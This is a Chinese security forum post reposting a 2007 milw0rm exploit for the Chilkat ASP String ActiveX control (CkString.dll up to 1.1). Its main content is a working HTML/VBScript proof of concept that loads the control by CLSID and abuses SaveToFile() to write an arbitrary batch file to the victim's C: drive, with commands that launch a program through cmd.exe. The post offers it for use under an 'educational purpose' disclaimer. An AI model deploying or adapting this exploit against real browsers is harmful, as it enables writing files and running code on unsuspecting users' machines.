‹‹ 上一主题 | 下一主题 ››
发新话题
打印

CHILKAT ASP String (CkString.dll <= 1.1) SaveToFile() Inscure Method

ring04h

团队执行官

Rank: 8Rank: 8

E.S.T核心成员 社区主管

帖子
3921 
精华
128 
积分
209639 
阅读权限
200 
性别
男 
在线时间
1092 小时 
注册时间
2007-10-23 
最后登录
2008-7-9 

资料收集奖 运营支持奖

楼主 发表于 2007-8-12 12:49  只看该作者

CHILKAT ASP String (CkString.dll <= 1.1) SaveToFile() Inscure Method

复制内容到剪贴板
代码:
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
<b>CHILKAT ASP String (CkString.dll <= 1.1) "SaveToFile()" Inscure Method</b>
url: [url]http://www.chilkatsoft.com/[/url]

author: shinnai
mail: shinnai[at]autistici[dot]org
site: [url]http://shinnai.altervista.org[/url]

This was written for educational purpose. Use it at your own risk.
Author will be not be responsible for any damage.

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to this exploits.

<b>This control is marked as:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller, data
IPersist Safe: Safe for untrusted: caller, data
IPStorage Safe: Safe for untrusted: caller, data</b>
-----------------------------------------------------------------------------

<object classid=&#39;clsid:90E567DA-5E79-4571-AB07-7A397FFBE995&#39; id=&#39;test&#39;></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language=&#39;vbscript&#39;>
Sub tryMe
Dim mStr
Dim MyMsg
  mStr = "echo off" & vbCrLf & _
     "cls" & vbCrLf & _
     "echo Hello World!" & vbCrLf & _
     "cmd.exe /c notepad.exe" & vbCrLf & _
     "pause"

  test.str = mStr
  test.SaveToFile ("c:\shinnai.bat"),"big5"
  MyMsg = MsgBox("Exploit completed!")
End Sub
</script>
</span></span>

</code></pre>

# milw0rm.com [2007-08-05]

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题